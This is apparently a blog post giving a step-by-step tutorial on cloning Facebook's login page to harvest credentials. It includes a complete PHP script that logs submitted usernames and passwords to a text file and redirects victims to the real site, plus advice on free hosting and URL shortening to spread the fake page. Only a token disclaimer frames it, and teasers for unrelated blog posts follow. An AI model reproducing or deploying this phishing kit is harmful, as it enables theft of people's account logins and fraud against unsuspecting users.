How to do a Phishing attack on Facebook?

This is a Step by step tutorial to make an undetectable Facebook phishing site.


Step 1: Download page source

Go to https://www.facebook.com

Right click on the blank area -> Click Save As













When dialog box appears select ‘Webpage, complete’ as Save as type -> Click Save























Step 2: Edit “Facebook - Log In or Sign Up.html” file and rename it.

Open ‘Facebook - Log In or Sign Up.html’ file with notepad or Dreamweaver.

Remove all the ajax codes. (You can download HTML file which removed all ajax codes form here https://github.com/nimeshikaranasinghe/Facebook-Phisihing.git )

Search for login action (Press Ctrl + F -> type ‘action=’ -> Click Find Next)


















Replace the highlighted part (as in the following screenshot) with getDetails.php



 Save the file as index.html
Step 3: Create getDetails.php

Open a notepad.
Type the following code

 <?php
            $username = $_POST["email"];
            $passw = $_POST["pass"];
           
            $newfile = fopen("usercredentials.txt", "a") or die("File cannot be opened");
            $details = " Username = $username \n Password = $passw \n\n";
            fwrite($newfile, $details);
           
            //Redirect browser to original login page
            header("Location: https://www.facebook.com/login.php");
           
            fclose($newfile);
            exit();
?>

Save the file as getDetails.php


Step 4: Create a completely blank text file with name usercredentials.txt

This file is used to store user credentials.
Now you should have all the following three files with you:
  1. index.html
  2. getDetails.php
  3. usercredentials.txt













Step 5: Host your website

Now you need to upload these three files in a free web hosting site.
  • Here are some useful free hosting websites.
www.000webhost.com
www.my3gb.com
www.freewebhosting.com
www.xhosting.com
http://110mb.com
http://ripway.com
http://superfreehost.info

I recommended you to use www.000webhost.com . It is easy.
Create an account on www.000webhost.com and upload your three files. 
How to upload files to 000webhost.com?

 Warning: If you didn’t remove the ajax codes properly your account will be suspended from the free hosting site.

Find your website URL.


















Now you are ready to share your website. If you can see the only difference is in your URL. The appearance is same as the original Facebook site.
















When someone try to login using your phishing site he/she will be redirected to the original Facebook site and username and password will be sent to the text file you created ‘usercredentials.txt’
Step 6: Shorten your URL

This step is alternative. You can use google URL shortener for this. 

















Step 7: View the user entered credentials.

Double click on the usercredentials.txt file which you have uploaded previously.

You can see usernames and passwords there.



This tutorial is only for educational purposes. I'm not responsible for any unlawful activities.  
If this article was helpful to you don't forget to put a like and share :)
If you have any questions comment here or email me. I'm here to help you. :)

Comments

Post a Comment

Popular posts from this blog

Introduction to Encryption

Image
What is Encryption? Encryption is like sending secret messages between parties; if someone tries to pry without the proper keys, they won't be able to understand the message. In other words, it is the process of locking up information using cryptography (Cryptography is both the practice and the study of hiding information.) Definition:  ‘ The Process of converting plain text into cipher text, something that appears to be random and meaningless ’ is called as the encryption. Process of converting cipher text back into original text is called as decryption . Terminology Original message is called as plain text/clear text.   Encrypted message is called as cipher text/encrypted text.  A Key which is a secret like a password which is used to encrypt and decrypt information.  Ciphers are the specific algorithms which are used to encrypt and decrypt data. A cipher is series of well-defined steps that can be followed as a procedure to encrypt and decrypt m
Read more

RESTful API

Image
RESTful APIs are application programming interfaces (API) that adhere to architectural style of REST architectural pattern and it is used to HTTP requests to GET, PUT, POST and DELETE data. RESTful API has the following features: Those are the guiding constraints which define a RESTful system. Client–server - The client handles the front end the server handles the backend and can both be replaced independently of each other. Stateless - No client data is stored on the server between requests and session state is stored on the client. Cacheable - Clients can cache response (just like browsers caching static elements of a web page) to improve performance. Uniform Interface - The key to the decoupling client from server is having a uniform interface that allows independent evolution of the application without having the application’s services, or models and actions, tightly coupled to the API layer itself. Layered System - REST APIs have different layers of their a
Read more